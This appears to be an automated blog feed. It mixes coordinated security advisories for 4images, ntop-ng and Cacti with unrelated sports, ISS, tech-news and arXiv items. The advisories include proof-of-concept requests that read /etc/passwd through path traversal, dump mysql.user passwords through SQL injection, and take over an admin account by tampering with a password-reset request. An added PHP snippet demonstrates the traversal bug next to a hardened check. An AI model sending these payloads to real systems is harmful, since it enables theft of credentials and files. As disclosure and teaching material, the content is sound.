Description: When downloading or displaying a backup file, the file parameter is vulnerable to directory traversal.

This is the case because the get_basefile function contains a bug. When the passed path name ends with a slash, it will return the entire path instead of the file name. By adding ?/ to the file name, an attacker can thus download or display arbitrary files.

Admin credentials are required to view or download backup files.

3. Proof of Concept

    GET /4images/admin/backup.php?action=downloadbackup&file=../../../../../../etc/passwd?/ HTTP/1.1
    GET /4images/admin/backup.php?action=showbackup&file=../../../../../../etc/passwd?/ HTTP/1.1

4. Code

/admin/backup.php

    if (isset($HTTP_GET_VARS['file']) || isset($HTTP_POST_VARS['file'])) {
      $file = (isset($HTTP_GET_VARS['file'])) ? get_basefile(trim($HTTP_GET_VARS['file'])) : get_basefile(trim($HTTP_POST_VARS['file']));
    }
    else {
      $file = "";
    }

    if ($action == "downloadbackup") {
      $size = @filesize(ROOT_PATH.DATABASE_DIR."/".$file);
      header("Content-type: application/x-unknown");
      header("Content-length: $size\n");
      header("Content-Disposition: attachment; filename=$file\n");
      readfile(ROOT_PATH.DATABASE_DIR."/".$file);
      exit;
    }

/includes/functions.php

    function get_basename($path) {
      $path = str_replace("\\", "/", $path);
      $name = substr(strrchr($path, "/"), 1);
      return $name ? $name : $path;
    }

    function get_basefile($path) {
      $basename = get_basename($path);
      preg_match("#(.+)\?(.+)#", $basename, $regs);
      return isset($regs[1]) ? $regs[1] : $basename;
    }

5. Solution

To mitigate this issue please upgrade at least to version 1.7.12: http://ift.tt/1NMG3Cf

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases fix
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public

Blog Reference: http://ift.tt/1Q0kSDr

Source: Gmail -> IFTTT-> Blogger
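
The get_basefile behaviour described in the path traversal advisory above can be reproduced offline. The following is an added example, not code from the advisory or from the 4images project: the two helper functions are copied from the advisory, while resolve_backup_file, the temporary directory and every input except the proof-of-concept value are assumptions made for illustration and are not the vendor's 1.7.12 fix.

```php
<?php
// Added example: runs the filename helpers quoted in the advisory next to a
// stricter check. Directory names and sample inputs are constructed.

// --- Helpers as quoted in the advisory (includes/functions.php, 4images 1.7.11) ---
function get_basename($path) {
    $path = str_replace("\\", "/", $path);
    $name = substr(strrchr($path, "/"), 1);   // "" or false when the path ends in "/"
    return $name ? $name : $path;             // falsy name => the whole path is returned
}

function get_basefile($path) {
    $basename = get_basename($path);
    preg_match("#(.+)\?(.+)#", $basename, $regs);  // strips "?..." but keeps any "../"
    return isset($regs[1]) ? $regs[1] : $basename;
}

// --- Hypothetical hardened check (an assumption, not the vendor's patch) ---
// Returns the absolute path of a file directly inside $backupDir, or null.
function resolve_backup_file($backupDir, $input) {
    $name = trim($input);
    // Drop a "?..." suffix first, so it cannot influence which component is kept.
    $q = strpos($name, "?");
    if ($q !== false) {
        $name = substr($name, 0, $q);
    }
    // Allow-list: a plain file name only, no separators, no leading dot.
    if (!preg_match('/^[A-Za-z0-9_][A-Za-z0-9._-]*$/', $name)) {
        return null;
    }
    // Defence in depth: the resolved file must still sit inside the backup directory.
    $base = realpath($backupDir);
    $full = realpath($backupDir . "/" . $name);
    if ($base === false || $full === false) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// --- Demonstration on constructed data ---
$backupDir = sys_get_temp_dir() . "/backup_demo_" . getmypid();
mkdir($backupDir);
file_put_contents($backupDir . "/db_backup.sql", "-- constructed sample backup\n");

$inputs = array(
    "db_backup.sql",                       // normal request (constructed)
    "db_backup.sql?download",              // name with a "?..." suffix (constructed)
    "../../../../../../etc/passwd?/",      // value from the advisory's proof of concept
    "..\\..\\secret.txt?/",                // backslash variant (constructed)
);

foreach ($inputs as $in) {
    $old = get_basefile($in);
    $new = resolve_backup_file($backupDir, $in);
    printf("input: %s\n", $in);
    printf("  get_basefile -> %s%s\n", $old,
        strpos($old, "/") !== false ? "   (still contains a directory part)" : "");
    printf("  hardened     -> %s\n\n", $new === null ? "rejected" : basename($new));
}

// Clean up the constructed files.
unlink($backupDir . "/db_backup.sql");
rmdir($backupDir);
```

The trailing slash makes substr() return an empty or false value, so get_basename falls back to the full path, and the regular expression in get_basefile then removes only the "?/" suffix.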

[FD] 4images 1.7.11: SQL Injection

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: 4images 1.7.11
Fixed in: 1.7.12
Fixed Version Link: http://ift.tt/1NMG3Cf
Vendor Website: http://ift.tt/XKxPm3
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: Requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: When backing up the database, the user can supply the tables that should be backed up. The program does not check if these tables actually belong to the 4images database or to a different database. Because of this, it is possible to back up, and thus read, any database the database user has access to.

However, even if there were a check for the database, it would still be possible to perform arbitrary SELECT statements by injecting into a SELECT query that looks like this: "SELECT * FROM $table" where $table is user supplied.

Admin credentials are required to back up the database.

3. Proof of Concept

    POST /4images/admin/backup.php HTTP/1.1

    __csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=mysql.user

    POST /4images/admin/backup.php HTTP/1.1

    __csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=4images_comments where comment_id=-1 union all select user,password,3,4,5,6,7,8 from mysql.user

4. Solution

To mitigate this issue please upgrade at least to version 1.7.12: http://ift.tt/1NMG3Cf

Please note that a newer version might already be available.

5. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases fix
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public

Blog Reference: http://ift.tt/1Q0kQLZ

Source: Gmail -> IFTTT-> Blogger

[FD] 4images 1.7.12: XSS

[FD] SQLMap Code Execute

Sqlmap Code Execute Team: Knownsec Team Site: http://ift.tt/zNDgKn --[ Contents

Source: Gmail -> IFTTT-> Blogger

[FD] ntop-ng <= 2.0.151021 - Privilege Escalation

ntop-ng Privilege Escalation (CVE-2015-8368)

# Product Details:

ntop-ng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well.

# Vulnerability Details:

In the latest stable release of ntop-ng it is possible to escalate the privileges of a non-privileged user to the admin account by resetting the password, intercepting the request and replacing the HTTP parameters.

# Vulnerability technical information

1. Login with an unprivileged account
2. Change the account password and intercept the request, modify the username= and Cookie user= and change to the admin account

Example:

    GET /lua/admin/password_reset.lua?csrf=XXXXXXXXXXXXXXXXXX&username=admin&old_password=12345&new_password=123456&confirm_new_password=123456 HTTP/1.1
    Cookie: user=admin; session=XXXXXXXXXXXXXXXXXXXXXXXXX

3. Login with the admin account and the password you defined in step #2

# Solution

Upgrade to ntop-ng 2.2 stable

# Advisory timeline

26.11 - Notified ntop security
27.11 - Vulnerability acknowledged, maintainer confirms it also affects the dev branch
28.11 - CVE assigned (CVE-2015-8368)
01.12 - ntop-ng 2.2 released with the fix
04.12 - Full disclosure

Source: Gmail -> IFTTT-> Blogger

[FD] Announcing NorthSec 2016 CFP + Reg - Montreal, May 19-22

www.nsec.io - northsec.eventbrite.ca

NorthSec 2016, one of the biggest applied security events in Canada, is coming up in Montreal May 19-22, with a 2-day technical conference followed by a 48h on-site CTF.

* We are looking for great speakers to submit to our 2016 CFP at http://www.nsec.io/cfp

Subjects covered range from Application & Infrastructure security: pentesting, network security, software and/or hardware exploitation, web hacking, reverse engineering, malware/viruses/rootkits or anything low-level that makes your personal clock tick!

We also will talk about cryptography & obfuscation, from theoretical cryptosystems to applied cryptography exploitation, cryptocurrencies, steganography and covert communication systems, anything goes!

Society & Ethics issues will be part of the show, since technical subjects are at the core of the security field, but they also exist in a world of humans, affected by their social environment & political context. If you want to exchange great ideas about the digital society and its security implications, NorthSec's the place!

* Registration for the event is up at http://ift.tt/1EVrqLo -

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2015-8369] Cacti SQL injection in graph.php

Application: Cacti
Vendor URL: http://www.cacti.net
Bugs: SQL injection
Author: changzhao.mao (DBAPPSecurity Ltd)
Version affected: 0.8.8f and prior

================================
Introduction
================================

Cacti is a complete frontend to RRDTool, it stores all of the necessary information to create graphs and populate them with data in a MySQL database. The frontend is completely PHP driven. Along with being able to maintain Graphs, Data Sources, and Round Robin Archives in a database, cacti handles the data gathering. There is also SNMP support for those used to creating traffic graphs with MRTG.

SQL injection vulnerabilities have been discovered. The vulnerability allows any user to execute their own SQL commands to compromise the web application or database management system. The vulnerabilities are located in the rra_id value of the graph.php file. This PHP file of older versions of Cacti may be accessible anonymously according to the cases I found from the internet. The latest version of Cacti may require guest user privilege.

[Vulnerability info]

/cacti-0.8.8f/graph.php line 25: include "./include/top_graph_header.php" before validating rra_id

    /* set default action */
    if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = "view"; }
    if (!isset($_REQUEST["view_type"])) { $_REQUEST["view_type"] = ""; }

    $guest_account = true;
    include("./include/auth.php");
    include_once("./lib/rrd.php");

    api_plugin_hook_function('graph');

    include_once("./lib/html_tree.php");
    include_once("./include/top_graph_header.php");

    /* ================= input validation ================= */
    input_validate_input_regex(get_request_var("rra_id"), "^([0-9]+|all)$");
    input_validate_input_number(get_request_var("local_graph_id"));
    input_validate_input_number(get_request_var("graph_end"));
    input_validate_input_number(get_request_var("graph_start"));
    input_validate_input_regex(get_request_var_request("view_type"), "^([a-zA-Z0-9]+)$");
    /* ==================================================== */

/cacti-0.8.8f/include/top_graph_header.php line 30: rra_id is not validated

    /* ================= input validation ================= */
    input_validate_input_number(get_request_var_request("local_graph_id"));
    input_validate_input_number(get_request_var_request("graph_start"));
    input_validate_input_number(get_request_var_request("graph_end"));
    /* ==================================================== */

line 158

\cacti-0.8.8f\lib\rrd.php function rrdtool_function_graph line 631

                $rra["timespan"] = 86400;
            }else{
                /* get a list of RRAs related to this graph */
                $rras = get_associated_rras($local_graph_id);

                if (sizeof($rras) > 0) {
                    foreach ($rras as $unchosen_rra) {
                        /* the timespan specified in the RRA "timespan" field may not be accurate */
                        $real_timespan = ($ds_step * $unchosen_rra["steps"] * $unchosen_rra["rows"]);

                        /* make sure the current start/end times fit within each RRA's timespan */
                        if ( (($graph_data_array["graph_end"] - $graph_data_array["graph_start"]) <= $real_timespan) && ((time() - $graph_data_array["graph_start"]) <= $real_timespan) ) {
                            /* is this RRA better than the already chosen one? */
                            if ((isset($rra)) && ($unchosen_rra["steps"] < $rra["steps"])) {
                                $rra = $unchosen_rra;
                            }else if (!isset($rra)) {
                                $rra = $unchosen_rra;
                            }
                        }
                    }
                }

                if (!isset($rra)) {
                    $rra["rows"] = 600;
                    $rra["steps"] = 1;
                }
            }
        }else{
            // sql injection here
            $rra = db_fetch_row("select timespan,rows,steps from rra where id=$rra_id");
        }

[Exploit]

poc: http://ift.tt/1Nc02x6

Source: Gmail -> IFTTT-> Blogger

[FD] Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability

================================================================ Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability ================================================================ Information

Source: Gmail -> IFTTT-> Blogger

Orioles: Baltimore offering 1B Chris Davis a 7-year deal, around $150M - Buster Olney; would be biggest in team history (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] [CORE-2015-0014] - Microsoft Windows Media Center link file incorrectly resolved reference

ISS Daily Summary Report – 12/8/15

Microbiome:  For Yui’s Return Minus Zero day (R-0) and Kelly’s Flight Day 240 Microbiome sessions, they each collected saliva samples today.  Kelly also collected water from the Potable Water Dispenser (PWD) in the galley and stowed it for ambient return on the 43 Soyuz (43S) vehicle, which is scheduled to undock from the ISS this Friday.  Microbiome investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time).   Observation and Analysis of Smectic Islands in Space (OASIS) Sample Exchange:  Kelly exchanged the OASIS samples in the Microgravity Science Glovebox (MSG) today.  Kelly was able to restore full functionality to the slide drawer mechanism yesterday, which allowed this activity to be performed today. OASIS studies the unique behavior of liquid crystals in microgravity, including their overall motion and the merging of crystal layers known as smectic islands. Liquid crystals are used for display screens in televisions and clocks, and they also occur in soaps and cell membranes. The experiment allows detailed studies of the behavior of these structures, and how microgravity affects their unique ability to act like both a liquid and a solid crystal.   Japanese Experiment Module (JEM) Airlock Operations for Robotics Refueling Mission (RRM):  Yui has  depressurized and vented the JEM Airlock today in preparation the retrieval later this month of RRM Task Board 4 from the ExPRESS Logistics Carrier-4 (ELC-4), located on the ISS Starboard 3 (S3) Truss.   Twins Study:  In support of the Twins Study, Kelly continued his week-long Flight Day 240 daily saliva collection and also made a urine collection.  This investigation is an integrated compilation of ten different studies led by multiple investigators.  
The studies take advantage of a unique opportunity to look at the effects of space travel on identical twins, with one of them experiencing space travel for a year while the other remains earth-bound for that same year.  The study looks at changes in the human body that are important in the fields of genetics, psychology, physiology, microbiology, and immunology.   Habitability:  Today Kelly documented his recent observations related to human factors and habitability for the Habitability investigation.  Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as near earth asteroids and Mars. Observations recorded during 6 month and 1 year missions can help spacecraft designers determine how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need.   Sleep Log:  Kornienko recorded a Sleep Log entry today after waking. The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Journals:  Kelly completed a Journals entry today. The Journals investigation obtains information on behavioral and human issues that are relevant to the design of equipment and procedures used by astronauts during extended-duration missions. Study results provide information used in preparations for future missions to low-Earth orbit and beyond.   Cygnus Arrival Preparation:  The USOS Crew reviewed the Cygnus rendezvous timeline and material associated with Cygnus retreat protocol, Cygnus lighting, navigation sensors, and camera settings.  Once their review was complete, they participated in a conference with specialist on the ground to answer any questions.   
43S Crew Departure Preparation:  Yui and Lindgren prepared and transferred US cargo that will be returning to the ground via 43S.  They also continued to pack their personal items. The personal items will return by way of 43S, SpaceX-8, and SpaceX-9 vehicles.  Finally, Yui worked with Kononenko to perform a Motion Control Test on 43S.  The 43S Crew is scheduled to return to earth on December 11th.   43S Nominal Descent Drill #2:  Yui, Lindgren and Kononenko all participated in a nominal Soyuz Descent Drill.  As part of this training they reviewed preliminary undocking and descent data, then worked through the descent timeline (from Soyuz activation through post-landing activities).   Portable Computer System (PCS) Hardware Audit:  Kelly performed a periodic audit of PCS hardware today.  During the activity he took note of serial numbers for all deployed PCS shells, batteries, 1553 cards and cables. The information was then downlinked for ground teams to track.   Today’s Planned Activities All activities were completed unless otherwise noted. TWIN – Sample Collection Morning Inspection. SM ПСС [Caution & Warning Panel] Test SLEEP – Questionnaire HRF – Sample Collection and Prep for Stowage Insertion HRF – Sample MELFI Insertion Acoustic Dosimeter Reminder JEMAL – Depress and Vent ВКС Laptops Antivirus Scan Check and Status Report CORRECTSIA. Logging Liquid and Food (Medication) Intake MORZE. Psycho-physiological Evaluation: Cattell’s Test Acoustic Dosimeter Setup SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) HDD (start) HAM radio session from Columbus USOS Window Shutter Closure Collect SM and FGB Air Samples Using АК-1М Sampler VIBROLAB. 
Monitoring hardware activation Monthly Inspection of T2 Treadmill System On-orbit hearing assessment using EARQ Progress 428 (DC1) Stowage Ops with IMS Support Review of Cygnus Capture Day Key Reminders ИПД Air Sample Collection for Ammonia in SM Cygnus Rendezvous Operations Conference HMS Defibrillator Inspection JEMAL- Closeout Verification JEMAL – JEM Airlock Vent Confirmation Post-Exercise Hygiene Procedure Soyuz 717 СУД Test No.2 Before Undocking Video Footage of Greetings / r/g 0816 HABIT – Experiment Ops WRS – Recycle Tank Fill Soyuz 717 АСУ Activation On MCC GO ISS Repress from ТКГ 428 (DC1) СрПК Section 1 – initiate Prepack US hardware to be loaded into Soyuz Microgravity Science Glovebox (MSG) Activation CORRECTSIA. Logging Liquid and Food (Medication) Intake On MCC GO ISS O2 Repress from ТКГ 428 (DC1) СРПК Section 1 – terminate INTERACTION-2. Experiment Ops Emergency Roles and Responsibilities Review Prepack US hardware to be loaded into Soyuz 43S SEISMOPROGNOZ. Download data from Control and Data Acquisition Module (МКСД) HDD (end) and start backup […]

from ISS On-Orbit Status Report http://ift.tt/1PZ2SJH
via IFTTT

It Works! Google's Quantum Computer is '100 Million Times Faster' than a PC

Announcing the results of its experiment, Google says its Quantum Computer is more than 100 Million times faster than a regular PC. Two years ago, Google and NASA (National Aeronautics and Space Administration) bought a D-Wave 2X quantum computer, which they have been experimenting with at the U.S. space agency's Ames Research Center in Mountain View, California for the past two years. The goal


from The Hacker News http://ift.tt/1YYspE6
via IFTTT

Watch the World's First Mind-Controlled Car in Action

While automobile giants like Nissan, Toyota and Tesla are focusing on self-driving smart cars, Chinese researchers have taken the future of automotive driving technology to a level that's beyond your imagination. Chinese researchers have built what they claim is the World's First Mind-Controlled Car, one that uses nothing but human brain power to drive. Doesn't that sound like a


from The Hacker News http://ift.tt/1R9zH6s
via IFTTT

Police Raid alleged Bitcoin Creator Craig Wright's Home in Sydney

Just hours after the Australian man 'Craig Steven Wright' was outed as the possible real identity of Satoshi Nakamoto, the anonymous creator of Bitcoin, Australian Police raided his home in Sydney. Over 10 police officers raided Wright's home in the Sydney suburbs on Wednesday afternoon. They forcefully opened the door, and 'started searching the cupboards and surfaces of the garage.'


from The Hacker News http://ift.tt/1HUmcFa
via IFTTT

Bitcoin Creator 'Satoshi Nakamoto' Unmasked! An Australian Man 'Craig Wright' identified...

Yes, Satoshi Nakamoto, the mysterious creator of the Bitcoin digital cryptocurrency has possibly been identified as an Australian entrepreneur, according to investigations independently done by Wired and Gizmodo. His name is Craig Steven Wright… ...at least based on some convincing evidence shown by both the publications. Bitcoin is a revolutionary virtual currency developed around


from The Hacker News http://ift.tt/1HUieMD
via IFTTT

Anonymous threat diverts Air France flight to Montreal

Anonymous threat diverts Air France flight to Montreal. Dec. 08, 2015 - 0:29 - Threat ruled a false alarm, this is the third such incident in recent weeks.

from Google Alert - anonymous http://ift.tt/1NUxADl
via IFTTT

Icelandic Legends and Aurora


Legends collide in this dramatic vista of land, sea, and sky. The land is Iceland, specifically Vík í Mýrdal, a southern village known for its beautiful black sand beaches. The sea, the Atlantic Ocean, surrounds Reynisdrangar, a sea stack of eroded basaltic rock pillars that Icelandic folklore tells are the petrified remains of trolls once attempting to drag a three-masted ship onto land. Watching from overhead and shining bright on the upper right is the god of the sky, according to Greek mythology: the planet Jupiter. Also visible in the sky are several other Greek legends encapsulated as constellations, including a lion (Leo), a big bear (Ursa Major), and a water snake (Hydra). One might guess that all of this commotion caused the spectacular aurora pictured -- but really it was just explosions from the Sun. via NASA http://ift.tt/1TXUTuT

Tuesday, December 8, 2015

Sensitivity analysis, multilinearity and beyond. (arXiv:1512.02266v1 [cs.AI])

Sensitivity methods for the analysis of the outputs of discrete Bayesian networks have been extensively studied and implemented in different software packages. These methods usually focus on the study of sensitivity functions and on the impact of a parameter change to the Chan-Darwiche distance. Although not fully recognized, the majority of these results heavily rely on the multilinear structure of atomic probabilities in terms of the conditional probability parameters associated with this type of network. By defining a statistical model through the polynomial expression of its associated defining conditional probabilities, we develop a unifying approach to sensitivity methods applicable to a large suite of models including extensions of Bayesian networks, for instance context-specific and dynamic ones, and chain event graphs. By then focusing on models whose defining polynomial is multilinear, our algebraic approach enables us to prove that the Chan-Darwiche distance is minimized for a certain class of multi-parameter contemporaneous variations when parameters are proportionally covaried.




from cs.AI updates on arXiv.org http://ift.tt/1M21BcZ
via IFTTT

Learning Discrete Bayesian Networks from Continuous Data. (arXiv:1512.02406v1 [cs.AI])

Real data often contains a mixture of discrete and continuous variables, but many Bayesian network structure learning and inference algorithms assume all random variables are discrete. Continuous variables are often discretized, but the choice of discretization policy has significant impact on the accuracy, speed, and interpretability of the resulting models. This paper introduces a principled Bayesian discretization method for continuous variables in Bayesian networks with quadratic complexity instead of the cubic complexity of other standard techniques. Empirical demonstrations show that the proposed method is superior to the state of the art. In addition, this paper shows how to incorporate existing methods into the structure learning process to discretize all continuous variables and simultaneously learn Bayesian network structures.




from cs.AI updates on arXiv.org http://ift.tt/1M21CgY
via IFTTT

Stochastic And-Or Grammars: A Unified Framework and Logic Perspective. (arXiv:1506.00858v2 [cs.AI] UPDATED)

Stochastic And-Or grammars (AOG) extend traditional stochastic grammars of language to model other types of data such as images and events. In this paper we propose a representation framework of stochastic AOGs that is agnostic to the type of the data being modeled and thus unifies various domain-specific AOGs. Many existing grammar formalisms and probabilistic models in natural language processing, computer vision, and machine learning can be seen as special cases of this framework. We also propose a domain-independent inference algorithm of stochastic context-free AOGs and show its tractability under a reasonable assumption. Furthermore, we provide an interpretation of stochastic context-free AOGs as a subset of first-order probabilistic logic, which connects stochastic AOGs to the field of statistical relational learning. Based on the interpretation, we clarify the relation between stochastic AOGs and a few existing statistical relational models.




from cs.AI updates on arXiv.org http://ift.tt/1MiLJ8p
via IFTTT

On-the-Job Learning with Bayesian Decision Theory. (arXiv:1506.03140v2 [cs.AI] UPDATED)

Our goal is to deploy a high-accuracy system starting with zero training examples. We consider an "on-the-job" setting, where as inputs arrive, we use real-time crowdsourcing to resolve uncertainty where needed and output our prediction when confident. As the model improves over time, the reliance on crowdsourcing queries decreases. We cast our setting as a stochastic game based on Bayesian decision theory, which allows us to balance latency, cost, and accuracy objectives in a principled way. Computing the optimal policy is intractable, so we develop an approximation based on Monte Carlo Tree Search. We tested our approach on three datasets---named-entity recognition, sentiment classification, and image classification. On the NER task we obtained more than an order of magnitude reduction in cost compared to full human annotation, while boosting performance relative to the expert provided labels. We also achieve a 8% F1 improvement over having a single human label the whole set, and a 28% F1 improvement over online learning.




from cs.AI updates on arXiv.org http://ift.tt/1TcnYUd
via IFTTT

Fast Convergence of Regularized Learning in Games. (arXiv:1507.00407v4 [cs.GT] UPDATED)

We show that natural classes of regularized learning algorithms with a form of recency bias achieve faster convergence rates to approximate efficiency and to coarse correlated equilibria in multiplayer normal form games. When each player in a game uses an algorithm from our class, their individual regret decays at $O(T^{-3/4})$, while the sum of utilities converges to an approximate optimum at $O(T^{-1})$--an improvement upon the worst case $O(T^{-1/2})$ rates. We show a black-box reduction for any algorithm in the class to achieve $\tilde{O}(T^{-1/2})$ rates against an adversary, while maintaining the faster rates against algorithms in the class. Our results extend those of [Rakhlin and Shridharan 2013] and [Daskalakis et al. 2014], who only analyzed two-player zero-sum games for specific algorithms.




from cs.AI updates on arXiv.org http://ift.tt/1JB6JcL
via IFTTT

[FD] MacOS/iPhone/Apple Watch/Apple TV libc File System Buffer Overflow

Hi @ll,

Today Apple fixed buffer overflow issue in LIBC/FTS (CVE-2015-7039).

Patch available for:
- OS X El Capitan v10.11 and v10.11.1
- iPhone 4s and later,
- Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
- Apple TV (4th generation)

Impact: Processing a maliciously crafted package may lead to arbitrary code execution

Description: Multiple buffer overflows existed in the C standard library. These issues were addressed through improved bounds

Conception and description of issue here: http://ift.tt/1PKWYKs

Best Regards,
Maksymilian Arciemowicz (http://cert.cx)
https://cxsecurity.com - Independent Information

Source: Gmail -> IFTTT-> Blogger

Anonymous declares this Friday 'ISIS trolling day'

Activist hacking group Anonymous have declared this Friday December 11 a “trolling day” against the so-called terrorist group Islamic State (ISIS) as ...

from Google Alert - anonymous http://ift.tt/1lMrBDI
via IFTTT

Ravens: Baltimore (4-8) drops five spots to No. 30 in Week 14 NFL power rankings; open here for full rankings (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 12/7/15

Orbital ATK (OA)-4 Launch: The Enhanced Cygnus spacecraft was successfully launched from Cape Canaveral, Florida atop a United Launch Alliance Atlas V Rocket on Sunday at 3:44pm CST. Sunday’s launch sets the stage for ISS rendezvous and capture on Wednesday, December 9th. Cygnus will be delivering approximately 3,500 kg of pressurized cargo to the ISS.

Microgravity Science Glovebox (MSG) Troubleshooting: Kelly and Yui performed troubleshooting to restore the MSG slide mechanism to proper alignment today. The slide mechanism initially malfunctioned on November 17th, preventing the work volume from being extended for crew access.

Microbiome: For his Return Minus Zero day (R-0) Microbiome session, Yui collected saliva samples Saturday, Sunday and today. Microbiome investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time).

Fine Motor Skills: One-year crewmembers Kelly and Kornienko each completed a session of the Fine Motor Skills experiment today. During the experiment they performed a series of interactive tasks on a touchscreen tablet. This investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. Fine Motor Skills sessions completed by Kelly and Kornienko will provide data for identification of trends or variations in fine motor performance in microgravity over the duration of their year-long space mission and upon their return to Earth.

Twins Study: In support of the Twins Study, Kelly continued his week-long Flight Day 240 daily saliva collections. This investigation is an integrated compilation of ten different studies led by multiple investigators. The studies take advantage of a unique opportunity to look at the effects of space travel on identical twins, with one of them experiencing space travel for a year while the other remains Earth-bound for that same year. The study looks at changes in the human body that are important in the fields of genetics, psychology, physiology, microbiology, and immunology.

Veg-01: On Saturday Kelly refilled the Veg-01 plant pillows with water. Lindgren also refilled them today. The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of seedlings in the spaceflight environment and the composition of microbial flora on the plants and the facility. For this run, Zinnias will be grown for 60 days and are expected to produce flowers.

Sleep Log: Both Kelly and Kornienko recorded Sleep Log entries Saturday and Sunday after waking. Kornienko also recorded an entry this morning. The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness. The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.

Crew Departure Preparation: Yui and Lindgren continued packing their personal items in preparation for crew return to Earth on Soyuz 43 (43S) on December 11th. The items will return by way of 43S, SpX-8, and SpX-9 vehicles.

Today’s Planned Activities

All activities were completed unless otherwise noted.

TWIN – Sample Collection SM ПСС (Caution & Warning Panel) Test Inspection of СМ-У, РУ2, РУ4, РУ5 connector on [МНР-НС] separator pump Acoustic Dosimeter Reminder SLEEP – Questionnaire HRF – Sample MELFI Insertion Work Prep CORRECTSIA. Logging Liquid and Food (Medication) Intake Charging GoPro HERO3 Camcorder Battery Acoustic Dosimeter Setup Return item stowage in Soyuz #717 FINEMOTR – Experiment execution Experiment Fine Motor Skills Crew Departure Prep Searching for cable PS-120 Exercise Data Downlink via OCA BODYM – Measurements for the experiment ИП-1 sensors positioning check MPEP Platform – Fasteners maintenance LBNP Training (PRELIMINARY) Auxiliary Laptop Anti-Virus Update Sony HVR-Z7E Camcorder Setup in SM Charging GoPro HERO3 Camcorder Battery – terminate EXPRESS-1 – Install DVD with s/w for payload ARED – Flywheel cylinder evacuation VEG-01 – Filling water to plant pillow Video camera GoPro HERO3 Prep for ТК 717 Descent Recording. Camera Adjustment. Tagup with specialists EML gas valve opening Installation of “Relocation and TORU” simulator SW version 1.11 on RSK1 Laptop. Tagup with specialists as necessary (S-band) Columbus cargo consolidation – Part 1 of 3 Soyuz 717 Samsung Tablet Charge – initiate WRS – Water samples analysis Columbus cargo consolidation – Part 2 of 3 [Deferred] Filling (separation) EDV-SV lid 1002 p.37 (00053403R, ФГБ1ПГО_1_107) CORRECTSIA. Logging Liquid and Food (Medication) Intake Soyuz #717 Return Cargo Stowage Ops ALGOMETRIA. Experiment Ops IMAX – H/w final packing and stowage for return EXPRESS 1 – Installation of DVD with s/w for payload – disk replacement HMS – Psychological Questionnaire СОЖ Maintenance Columbus cargo consolidation – Part 3 of 3 [Deferred] PILOT-T. Experiment Ops EXPRESS 1 – Installation of DVD with s/w for payload – disk replacement Sony HVR-Z7E Camcorder Power Off in SM VSG box trouble shooting Cleaning ПФ1, ПФ2 Dust Filters and В1, В2, Fan Screens in MRM2 Tightening of QD Screw Clamps between DC1 and Progress 428 PILOT-T. Closeout Ops MPEG2 Video Test prior to ТПК 719 (45S) Docking VIZIR. Experiment Ops VSG box trouble shooting Soyuz #717 Samsung tablet charging – terminate Evening Work Prep EXPRESS 1 – Installation of DVD with s/w for payload – disk replacement INTERACTION-2. Experiment Ops TOCA – Data Recording EXPRESS 1 – Installation of DVD with s/w for payload – disk replacement EHS – BOSE head set quality evaluation (S/N 1013, 1023 and 1024.) Replacement of FGB Dust Collector ПС1, ПС2 Filters (ФГБ1ПГО_4_419_1, bag 429-16 (00068131R)). Discard the removed items. Reflect changes in IMS Daily Planning Conference (S-band) Reading Reminder about saliva samples installation in MELFI CORRECTSIA. Logging Liquid and Food (Medication) Intake Reading Reminder about saliva sampling Preparing for Antivirus scan on Auxiliary Computer Laptops Reading Reminder about saliva samples installation in MELFI HABIT – Reading Reminder Reading Reminder about saliva sampling IMS Delta File Prep Personal Data Prep for Return Installation of inserts to ease opening of SM interior panel latches (Prepare “Элементы конструкции” (Structural Elements) kit (004890R), ФГБ1ПГО_4_427_1, […]

from ISS On-Orbit Status Report http://ift.tt/1ICjwMz
via IFTTT